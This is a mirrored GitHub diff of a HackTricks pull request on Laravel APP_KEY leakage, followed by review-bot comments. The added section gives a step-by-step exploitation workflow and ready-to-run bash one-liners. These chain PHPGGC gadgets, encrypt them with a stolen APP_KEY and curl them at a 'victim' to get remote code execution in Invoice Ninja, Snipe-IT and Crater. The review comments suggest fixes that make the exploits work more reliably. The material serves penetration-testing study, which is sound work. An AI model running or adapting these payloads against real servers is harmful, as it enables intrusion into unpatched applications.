mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Merge pull request #1219 from HackTricks-wiki/update_Laravel__APP_KEY_Leakage_Analysis_20250731_124055
Laravel APP_KEY Leakage Analysis
This commit is contained in:
commit
af03f5d540
@ -64,10 +64,30 @@ The script transparently supports both CBC and GCM payloads and re-generates the
|
||||
| Crater (CVE-2024-55556) | `SESSION_DRIVER=cookie` → `laravel_session` cookie | Laravel/RCE15 |
|
||||
|
||||
The exploitation workflow is always:
|
||||
1. Obtain `APP_KEY` (default examples, Git leak, config/.env leak, or brute-force)
|
||||
2. Generate gadget with **PHPGGC**
|
||||
3. `laravel_crypto_killer.py encrypt …`
|
||||
4. Deliver payload through the vulnerable parameter/cookie → **RCE**
|
||||
1. Obtain or brute-force the 32-byte `APP_KEY`.
|
||||
2. Build a gadget chain with **PHPGGC** (for example `Laravel/RCE13`, `Laravel/RCE9` or `Laravel/RCE15`).
|
||||
3. Encrypt the serialized gadget with **laravel_crypto_killer.py** and the recovered `APP_KEY`.
|
||||
4. Deliver the ciphertext to the vulnerable `decrypt()` sink (route parameter, cookie, session …) to trigger **RCE**.
|
||||
|
||||
Below are concise one-liners demonstrating the full attack path for each real-world CVE mentioned above:
|
||||
|
||||
```bash
|
||||
# Invoice Ninja ≤5 – /route/{hash}
|
||||
php8.2 phpggc Laravel/RCE13 system id -b -f | \
|
||||
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v - | \
|
||||
xargs -I% curl "https://victim/route/%"
|
||||
|
||||
# Snipe-IT ≤6 – XSRF-TOKEN cookie
|
||||
php7.4 phpggc Laravel/RCE9 system id -b | \
|
||||
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v - > xsrf.txt
|
||||
curl -H "Cookie: XSRF-TOKEN=$(cat xsrf.txt)" https://victim/login
|
||||
|
||||
# Crater – cookie-based session
|
||||
php8.2 phpggc Laravel/RCE15 system id -b > payload.bin
|
||||
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v payload.bin --session_cookie=<orig_hash> > forged.txt
|
||||
curl -H "Cookie: laravel_session=<orig>; <cookie_name>=$(cat forged.txt)" https://victim/login
|
||||
```
|
||||
|
||||
|
||||
---
|
||||
|
||||
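Review bot: the Crater one-liner does not match the table row it is meant to demonstrate. The row names the `laravel_session` cookie (`SESSION_DRIVER=cookie`) as the `decrypt()` sink, but the `curl` line sends `laravel_session=<orig>` untouched and places the forged ciphertext in a separate `<cookie_name>` cookie, so a reader cannot tell which cookie is actually decrypted; either say that `<cookie_name>` is the app-specific session cookie name (Laravel derives it from `APP_NAME`) and drop the unforged `laravel_session=<orig>`, or send the forged value as `laravel_session`. Two smaller points in the same block: step 1 says "32-byte `APP_KEY`", but Laravel also accepts a 16-byte key with `AES-128-CBC`, so the brute-force step should not assume the length; and the Invoice Ninja one-liner pipes the ciphertext straight into a path segment via `xargs -I% curl "https://victim/route/%"` although the encrypted payload is base64 (`+`, `/`, `=`), so it should be URL-encoded before being used in the route.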
@ -180,7 +200,8 @@ Another deserialization: [https://github.com/ambionics/laravel-exploits](https:/
|
||||
|
||||
|
||||
## References
|
||||
* [Laravel: APP_KEY leakage analysis](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
|
||||
* [Laravel: APP_KEY leakage analysis (EN)](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
|
||||
* [Laravel : analyse de fuite d’APP_KEY (FR)](https://www.synacktiv.com/publications/laravel-analyse-de-fuite-dappkey.html)
|
||||
* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer)
|
||||
* [PHPGGC – PHP Generic Gadget Chains](https://github.com/ambionics/phpggc)
|
||||
* [CVE-2018-15133 write-up (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)
|
||||
|
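Review bot: the reference list now carries two entries for the same URL, `* [Laravel: APP_KEY leakage analysis](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)` and `* [Laravel: APP_KEY leakage analysis (EN)](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)`; if the untagged line is meant to survive alongside the new EN/FR pair it is redundant and should be dropped so the list reads as one EN entry and one FR entry.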